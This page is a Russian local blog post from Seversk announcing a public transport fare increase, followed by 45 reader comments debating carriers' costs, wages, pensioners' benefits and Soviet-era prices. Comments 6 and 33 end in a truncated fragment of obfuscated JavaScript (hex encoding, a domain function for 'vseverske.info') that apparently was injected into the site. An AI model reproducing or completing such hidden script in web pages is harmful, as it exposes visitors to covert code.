Последние комментарии:

10.04.2024 12:39 написал ponni
05.04.2024 09:57 написал ponni
04.04.2024 19:31 написал navator
02.04.2024 16:31 написал ponni
31.03.2024 16:27 написал shrek
29.03.2024 22:11 написал барыга
29.03.2024 09:38 написал ponni
28.03.2024 21:49 написал барыга
26.03.2024 00:12 написал ponni
19.03.2024 20:31 написал ponni
16.03.2024 21:51 написал alex33kaw
14.03.2024 19:11 написал ponni
05.03.2024 23:34 написал tourson
01.03.2024 18:51 написал ponni
01.03.2024 18:49 написал ponni

Проезд подорожает


Проезд подорожает
Проезд подорожает
Проезд подорожает

ответ в диалоге на 4 странце http://dialog-seversk.ru/uploads/pdfarchive/88.pdf





Автор: vn189

Категория: Блоги

Комментарии: (45) 

30 ноября 2015   -20

Информация

Посетители, находящиеся в группе Гости, не могут оставлять комментарии в данной новости.
 

Комментарий № 1:

Написал: BlackFox
Качество предоставляемых услуг маршрутниками, нет и не будет, даже если проезд по северску будет стоить 20 рублей !!! А затраты у всех стали больше, не только у маршрутников, маршрутники у нас в городе САМЫЕ бедные и несчастные им всегда мало денег !!!

Комментарий № 2:

Написал: Марина 75
Повысится проезд в счет затрат маршрутников или их зарплат?

Комментарий № 3:

Написал: Justime
Еще смешнее цена проезда на маршрутке  в Томск. Расстояние до Томска просто смешное  - а цена как в Московском метро за проезд..  Слов нет...

Комментарий № 4:

Написал: Avedi
Смысл любого повышения цен это отжать и нажиться на тех, кто не сможет также поднять цены на свои услуги.

Комментарий № 5:

Написал: f1gv83
про требование к качеству предоставляемых услуг помолчали бы!
сколько уже подымали тарифы, и где все требования? а на замечания жителей одни отписки, с которыми только до ветру..

Комментарий № 6:

Написал: Kapitalin-nike
БЫДЛО МОЛЧИТ - ШАКАЛЫ БОРЗЕЮТ! // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "vseverske.info"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Комментарий № 7:

Написал: bolek
С недавних пор катаюсь на маршрутках (442 в Томск и обратно). За все время кондуктор был только 1 раз! И это в часы пик (утром на работу, вечером с работы).
Когда в динамиках навигационной системы звучит типа "Своевременно оплачивайте проезд, в салоне работает кондуктор..." всегда кричу - "Где? Где этот человек?"

О каких услугах и сервисе идет речь?
 

Комментарий № 8:

Написал: воспитатель
ранее уже писал, что в Северске и 10 руб рентабельно, если  сделать нормальный график, а не 1 мин по камуне интервал.... об этом никто бумать не хочет

Комментарий № 9:

Написал: bb
Хожу по Северску пешком и буду ходить. 

Комментарий № 10:

Написал: Ульяна
вот смешно,честное слово,конечно в Томске народу больше, ну так у нас маршрутки пустые ходят, и едут еле-еле по городу,народ ждут по остановкам.
Может стоит машрутников посократить?

Комментарий № 11:

Написал: Wampir666
Перд-ки надо растрясать, ходить пешком, а не на автобусе их возить!!!!

Комментарий № 12:

Написал: Roman
Wampir666,
Ты свой уже растрясаешь?

Комментарий № 13:

Написал: лавандос
Вот никак не могу понять негодования  н апредмет того, что деньги таки пойдут на зарплату перевозчикам. Откуда вообще берется  это нежелание, чтобы кто-либо вдруг станет чуть больше, чем раньше получать. Притом: есть индекс инфляции официальный даже,хотя бы.  Есть информация о годовалом пересмотре тарифов. Скажите мне: НУ ПОЧЕМУ непременно нужно, чтобы  все, кроме нас ,получалаи меньше????? Я, вот , к примеру, считаю, что если все станут получать больше, то и я  вместе с ними рано или поздно. Ну так устроен мир.  Единственное, что мне всегда не нравится, так это то, что не все маршрутники возят бесплатно тех пенсионеров, которым положено бы это  по экономическим мотивам.  Ну, то есть, обычные пенсионеры с ничтожными пенсиями. Хотя , я понимаю, что тут вопрос нужно решать в других кабинетах. Примерно так: ты, паря, хочешь так или иначе зарабатывать каким-никаким бизнесом, так вот будь добЁр, принимай у себя на борту  всех льготников ,коим положено за труд их, за всё, что они сделали, чтобы ты сегодня имел это самое право зарабатывать и т.д.

Комментарий № 14:

Написал: RRR
Опять 25.
Врачей и весь медперсонал, педагогов сокращаем легко... зарплату в 2015 (в сравнении с 2014) снижаем бюджетникам  легко...экономим бюджетные средства... давайте всем миром скинемся води-телям на безбедную жизнь по 14 рублей за проезд.
Всем сокращаем, а им прибавим за наш счёт. С какого рожна?

Комментарий № 15:

Написал: лавандос
RRR,
 эээ, нееет.  кото это  МЫ СОКРАЩАЕМ ? Я вот никому ничего не сокращаю. СЧтало быть я уже не в тех "МЫ". Потом, к примеру ,думцы не сокращают, Роснефть не сокращает и так далее.   А маршрутники должны сесть ,подумать и сказать: брацы, бляха-муха, ну ведь всем хреново так живется  Всем зарплаты -пенсии урезают.. Не можем мы в такой трудный для страны час так поступать. давайте и мы снизим плату за проезд. "
Нет уж ,господин хороший,  пускай тот, кто кому-то сокращает и побеспокится о том, чтобы сокращая ему не в тягость было до поликлиники и школы добираться автобусом. А то ты видел каими трубами и каким напором ежесекундно, не прекращаясь  течет та же нефть  ? Не видел? Съезди -посмотри. А это наши с тобой недра.  И это нам не хватает копеек, чтобы мы срач устраивали за два рубля на поездку. Так то вот.  А то, что чужие деньги в чужом кошельке считать -это жлобство , прям,жлобство. фуууууу, какое жлобство!!!

Комментарий № 16:

Написал: Panika
Эти далба.бы из администрации северска должны обеспечить льготный (бесплатный )  проезд льготным категориям граждан на всех маршрутах города. а могут по факту только в казенном предприятии у которого нет таких маршрутов как 30,32,33 короче популярных в городе.

И это блеать крепкие хозяйственники ебтвм. 

Комментарий № 17:

Написал: Афоня
полная беззубость и проституция власти .....   сказать нет мафии  маршрутчиков немогут а что вообще могут .... ???????    а да оправдать свою беспомощьность .....

Комментарий № 18:

Написал: лавандос
Panika,
Да. я об этом и говорю, что проезд льготников - это спокойно регулируемая административно-экономическим ресурсом штуковина.  не берусь прям так сразу предложить законное основание( надо посидеть-помозговать), но  нормальные юристы должны найти  законные основания для  определенных ( проезд льготников) условий лицензирования. Ходов масса.

Комментарий № 19:

Написал: bb
лавандос, Вы, наверное, не понимаете, что у основной массы населения зарплата упала, а не поднялась. Инфляция подняла цены на продукты, коммунальные платежи, а тут еще и на проезд цены вырастают. 
Вместо оптимизации просто поднимают цены, но тем, кого называют "экономически активным населением" от этого не легче. В итоге, душат со всех сторон как могут.
Цитата: лавандос
проезд льготников - это спокойно регулируемая административно-экономическим ресурсом штуковина.
Да ничего подобного, как правило, оплачиваем эти льготы мы с вами.
Цитата: лавандос
А то, что чужие деньги в чужом кошельке считать -это жлобство , прям,жлобство. фуууууу, какое жлобство!!!

Так вот этоим жлобством как раз маршрутники и занимаются. 


Комментарий № 20:

Написал: лавандос
bb,
Да конечно я не понимаю. Я же тупок.
 Только снова мимо на счет того, что я как-то участвую в оплате льгот.
Дальше: Инфляция за год есть? Каков её индекс ? даже не вникая в суть расходов автомобилистов "все мы" понимаем ,что они возросли за год.  2 рубля от 12 -это даже ниже реальной инфляции.
Следующее: насколько мне известно ,даже учитывая, что льготники все же что-то платят,то их не коснется повышение. Проехали про льготников -я уже выразил свое мнение и  искать надо решение в других кабинетах. А жлобство маршрутников по отношению к льготникам я не отрицаю.
 Дальше поехали.  на какую сумму ф цифрах станет беднее среднестатистический пассажир? рублей на 100 в месяц? Это с учетом, что он 50 раз ПЯТЬДЕСЯТ,КАРЛ!!!! проедет на автобусе. Бляха как придушили . Аж невмоготу. Да и 50 раз  в месяц  точно среднестатистический горожанин не ездит. Каике ещё вопросы я тут упустил, господин "со всех сторон задушенный"????

Комментарий № 21:

Написал: Roman
лавандос,
А если ты не один, как сыч, живешь, а семьей, Карл? А если кроме этого надо еще платить за два садика, квартиру, подорожавшую еду? А зарплаты, Карл, в Северске на уровне 20-25к в месяц. В лучшем случае.
Сто раз уже говорили - уменьшить надо кол-во автобусов, чтоб не ходили пустыми гуськом. 

Комментарий № 22:

Написал: ararat
Увеличить интервал, уменьшить кол-во автобусов, цену сделать 10 руб!!!

Комментарий № 23:

Написал: hvk
Пусть Администрация выйдет на остановки и посмотрят на вереницы пустых автобусов. 

Однозначно увеличивать интервал и часть маршрутников отправлять на Томск !!!  

Комментарий № 24:

Написал: лавандос
Roman,
 Значит за подорожавшую еду, за садики и т.д. платить "НАДО", но  не за проезд,ога??  Может мне компенсировать начать эти два рубля?  Ну я готов компенсировать 50 поездок  по 2  рубчика сильно нуждающимся. Может потом где-нибудь зачтется)))
А "проблемы" семьи и двух детей тоже маршрутники должны решать?  Двое детей в садике-это уже как минимум был материнский капитал,да?  То есть социалка сработала,правда? Есть ещё всяческие программы. Но почему именно проезд?
А з\п в 20-25 к в месяц( я так понимаю на одно лицо)-это около полутора тысяч поездок. В ЭСЭСЭРЕ я получал 90 руб и тоже мог полторы тысячи раз ( 6 коп.) проехать в автобусе. И не орал, что меня обирают. При том, что там была экономика плановая, а сегодня немного не плановая,ладно(?). А льготы, скидки  ,  доплаты  за детей,за семью,и прочую фуэту скорее не у маршрутников надо выбивать.,а у властей. Ну и уж совсем  вряд ли кто имеет право регулировать количество рейсов и проч.,влезая в кухню  ЧУЖОГО бизнеса.  По крайней мере законом вряд ли пока такое предусмотрено. 

Комментарий № 25:

Написал: intelligent
Цитата: лавандос
Ну и уж совсем вряд ли кто имеет право регулировать количество рейсов и проч.,влезая в кухню ЧУЖОГО бизнеса.


Муниципальные, а тем более межмуниципальные перевозки для закрытого города имеют стратегическое значение, в том числе и в вопросе безопасности. Поэтому, не можете выполнять требования заказчика и вести свой бизнес честно - не суйтесь.

Комментарий № 26:

Написал: лавандос
[url=http://]Муниципальные, а тем более межмуниципальные перевозки для закрытого города имеют стратегическое значение, в том числе и в вопросе безопасности. Поэтому, не можете выполнять требования заказчика и вести свой бизнес честно - не суйтесь[/url]
 Не в коня корм. Муниципальный заказ -это одна сторона медали, а вот запретить предринимателю ездить сверх муниципального заказа-это ни в какую "стратегическую инициативу" не помещается.

Комментарий № 27:

Написал: BVD
Мало,кто заметил,что цены на хлеб с 30 ноября также подорожал  на 20 %, видимо Шамкину не хватала пошамкать больше хлеба.

Комментарий № 28:

Написал: Roman
лавандос,
Никто не запрещает. Но гонять пустые автобусы и на этом основании требовать поднять оплату - вот тут можно и запретить. И про 90 советских рублей не свисти. Будешь школьникам рассказывать сказки эти. В нашем городе таких зарплат не было, с учетом коэффициента. Ну и даже пусть 90р - вспомни-ка сколько процентов из них ты тратил на оплату квартиры.

Комментарий № 29:

Написал: лавандос
Roman,
И ещё джинсы   "Супер Пэррис" за 370  рэ или Монтану за 350 и т.д ,т.д. У меня нормальная память , ясный рассудок и все остальное. Нельзя вырывать из контекста какие-то одни показатели на что-то.  В миоровой экономике всегда всё меняется. И цены  и валюты и приоритеты.
 Вернеся к маршрутникам.  В некоторый раз повторюсь: Вопросы квотирования ,регламента, реестра и всякой прочей ерунды-это вопросы НЕ маршрутников.   Меня ,к примеру, вообще удивляет  ( не говорю, что я резко против) существование Антимонопольной службы, участвующей в ценообразованиио не об этом сейчас. А сейчас я о том-почему вдруг вопросы направлены именно к ним, к людям , которые  пытаются чуть-чуть (совсем  чуть-чуть) приподнять ценник в попытке догнать рост цен . Ты вот кем трудишься , если это не гостайна? Я не спрашиваю где, а  просто сфера. Если это не сфера услуг, то ты никогда не поймешь сути происходящего. Если ты не участвуешь в  формировании "средств производства" и всё вот это вот.

Комментарий № 30:

Написал: лавандос
А оклады в нашем городе были  и по 70 рублей,кстати.

Комментарий № 31:

Написал: Roman
лавандос,
При чем тут я? Я вообще не показатель. В попытке "догнать рост цен" за 2 года их тариф вырос на 40%. Покажите мне ещё кого-нибудь в Северске, у кого на 40% зарплаты выросли.

Комментарий № 32:

Написал: sovetnik
Хлеб 2 года назад 10р стоил, а сейчас 20-30р.

Комментарий № 33:

Написал: Kapitalin-nike
Цитата: ararat
Увеличить интервал, уменьшить кол-во автобусов, цену сделать 10 руб!!!
 Не для того воры из здания по адресу пр.Комм-й, 51, уничтожили муниципальный автопарк и крышуют частных перевозчиков, чтобы о простых горожанах думать! Сначала шаминская шобла должна оказаться на помойке, а уж потом стоимость проезда хоть до 6 копеек! fellow 

 

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "vseverske.info"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Комментарий № 34:

Написал: лавандос
Roman,
 ну,ты знаешь как называется вот эта штуковина, которую ты сейчас тут пытаешься протолкнуть, да?   Как минимум это манипуляция Не надо  повышать з\п на 40 процентов, чтобы уравновесить  подорожавший на 40 % проезд на транспорте. Вот ты, как раз, такой фуфломицин не умеющим считать  первоклашкам или так и не научившимся олигофренам вкручивай.
 Для наглядности: 400 рублей в месяц на проезд( 40поездок по  10 рублей) при з/п в 20 тыр-это 2% от дохода.  560 руб.( 40 поездок по 14 рублей), даже ,допустим ,что за два года з\п не увеличилась) -это 2.8% от него же. Так о каких таких повышениях зарплат  на 40% ,для того , чтобы  было безболезнено повышение за проезд ты говоришь?

Комментарий № 35:

Написал: воспитатель
ну, что Вы все мучаетесь ОБЪЯСНЯЮ, чем больше автобусов на маршруте тем БОЛЬШЕ зарабатывают диспетчерские службы, а им наплевать с какой выручкой уйдёт водитель, диспетчеров курирует администрация, все дороги ведут на КОММ 51, а если увеличить интервалы движения, то надо убирать по 4-6 автобусов с каждого внутригородского маршрута, а следовательно уменьшится выручка у диспетчеров, а это не мало 29, 442, 401, 405 маршрут платят по 200 руб день  30,31,32,17 по 100 руб день, а приинтервале по Коммуне 2-3 мин, выростет выручка у ВОДИТЕЛЯ, и поэтому я УТВЕРЖДАЮ, что 10руб в СЕВЕРСКЕ РЕНТАБЕЛЬНО, даже за все вычеты+ ремотн и налоги, сам работал водителем и знаю все проблемы. В СЕВЕРСКЕ все беды от бездумной работы АДМИНИСТРАЦИИ развели массу лишних предпринимателей, вот и повышают цены на проезд, чтоб всем хорошо было, только не людям-пассажирам, а убрать предпринимателя на автохламе с маршрута не могут---не сильно бедно живут все владельцы автобусов, я ВАС уверяю, только не путайте водителя и владельца автобуса, водитель это наёмный работник он на плане сидит ,а ИП хапуги план поднимают, поэтому если ПРОЕЗД УВЕЛИЧИТСЯ В ЦЕНЕ просто ПРИПОДНИМУТ план и ОПЯТЬ водитель ничего не получит... ВСЕ ПРОБЛЕМЫ В БЕЗЗЗЗЗУБОСТИ АДМИНИСТРАЦИИ в данном случае поднятия цены на проезд выигрывают ИП и больше никто

Комментарий № 36:

Написал: Эндрю

Лавандос Оклад в нашем городе во времена СССР действительно был 70 рублей, а районный коэффициент 30 %. Прожиточный минимум 35 рублей на одного человека. Коммуналка не более 22% от прожиточного минимума. Проезд 6 копеек, белый хлеб-20 копеек и так далее. Все доходы и расходы были нормированными, а сейчас кто в лес , а кто по дрова . Нет единой политики у всех.

Комментарий № 37:

Написал: лавандос
Эндрю,
[url=http://]Все доходы и расходы были нормированными, а сейчас кто в лес , а кто по дрова . Нет единой политики у всех[/url]

  И ? что из сего следует? Надо единую политику ценообразования взять и обнаружить  в стране  какого-нибудь понедельника? Толкьо в стране немного другая экономическая модель. А к тем вот 6 копейкам за проезд  , следовало бы продолжить и другие ценники. На ТНП,например. Я уже выше упоминал про джинсы, стоимостью более 300 рублей. Можно повспоминать и обувь и одежду и хрусталь с коврами. Только вот ЧТО брать за точку отсчета? Проезд в автобусе? Булка хлеба? Бутылка водки? Обед в столовой? Жене сапоги?? Что???  Собсна при 6 копейках за  проезд ,литр бензина был 40 коп. Но то была абсолютно иная экономическая  ситуация.  Ну  в стране 90% транспорта было общественным.
 Что- то стало менее ёмким, что-то более. Но уж точно, что прибавка в два рубля за проезд-это не тот случай ,по которому стоит  зоб раздувать. Вот если с января  херак и за квартиру вместро 3-х,например влупят 10, то тогда можно будет потолковать.

Комментарий № 38:

Написал: Roman
лавандос,
А где ты, например. за квартиру видел 3? У меня, например, 6

Комментарий № 39:

Написал: vn189
Roman,
за двушку в хрущевке прописано 3 человека,проживают двое вкарплата 3000,отсилы 3200

Комментарий № 40:

Написал: лавандос
Roman,
Ты богатый человек,Рома, а за два рубля штаны рвешь))) У моего соседа 50 кв.м и  плата что-то около 3200. Где ты живешь?

Комментарий № 41:

Написал: Roman
лавандос,
Старый город, всё по счетчикам. Правда, не 50 кв.м

Комментарий № 42:

Написал: лавандос
Roman,
Ромка, надо что-то менять. Так тебя обдирут как липку. Ты спроси,если что, я возможно что-то подскажу. Совед -то мой тоже из старого города. А вишь какая дельта.))

Комментарий № 43:

Написал: лавандос
соСед

Комментарий № 44:

Написал: Roman
лавандос,
Да что ты все за меня переживаешь? В городе есть и другие люди, а мне просто не все равно.

Комментарий № 45:

Написал: лавандос
Roman,
 да я вообще за соотечествинников переживаю.  )) А за тебя ли, за кого другого  -это не имеет значения. Просто в данном случае ты.....-"попутчик".
stroimguru.ru
Курс валюты:
94.07 42↑   $     99.93 41↑  

Опрос дня:

Вы будете делать прививку от коронавируса?

Нет   49.38%
   
Да, планирую   8.64%
   
Да, но если заставят (на работе / для путешествий)   4.94%
   
Уже сделал   27.16%
   
Затрудняюсь ответить   9.88%
   
Всего голосов: 81

Все опросы >>

Архив статей: